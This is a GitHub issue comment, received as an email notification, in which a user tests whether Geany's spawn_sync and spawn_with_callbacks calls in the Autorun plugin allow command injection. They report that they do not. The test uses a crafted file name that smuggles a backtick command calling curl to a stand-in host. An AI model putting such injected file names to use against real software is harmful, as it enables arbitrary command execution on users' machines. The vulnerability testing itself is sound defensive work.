WrapEarnPass left a comment (geany/geany-plugins#1584) Does [geany](https://www.geany.org/manual/reference/spawn_8h.html) spawn_sync or spawn_with_callbacks suffer from this vulnerability by default? geany/testing,now 2.1-2 from debian. Autorun@ecb8948276418a7eef897b5adb516181a5c72706 (before g_shell_quote was shoved in as a mitigation) src/spawn.c@229 ```spawn_with_callbacks(current_cmd->working_dir, current_cmd->command, NULL``` an unescaped "command with arguments" put in the command and not the argv of spawn_with_callbacks src/spawn.c@287```spawn_sync(current_cmd->working_dir, current_cmd->command, NULL``` an unescaped "command with arguments" put in the command and not the argv of spawn_sync
Action performed: save File ```'test`curl evil.example |tee test.file`.c'``` which should invoke the Autorun C Before-Save@287 and On-Save@229 commands. Safe results: Command not runnable, or a clang-format and clang-tidy error. Indication of compromise: A curl error about evil.example, or test.file creation in WD Actual results <img width="1359" height="525" alt="Image" src="https://github.com/user-attachments/assets/1398fd44-1cd1-4ad6-a544-76e1df666416" /> No test.file was created. both spawn_with_callbacks and spawn_sync are not vulnerable regardless of whether or not the command is escaped. Since the ```g_spawn_command_line_sync``` and other invocations are not geany library calls, I would have to rely on the maintainer of each plugin to determine they have used those calls correctly, as I am not familiar with them. I am updating the initial list to remove the known non-impacted library calls. -- Reply to this email directly or view it on GitHub: https://github.com/geany/geany-plugins/issues/1584#issuecomment-4860253197 You are receiving this because you are subscribed to this thread. Message ID: <geany/geany-plugins/issues/1584/[email protected]>
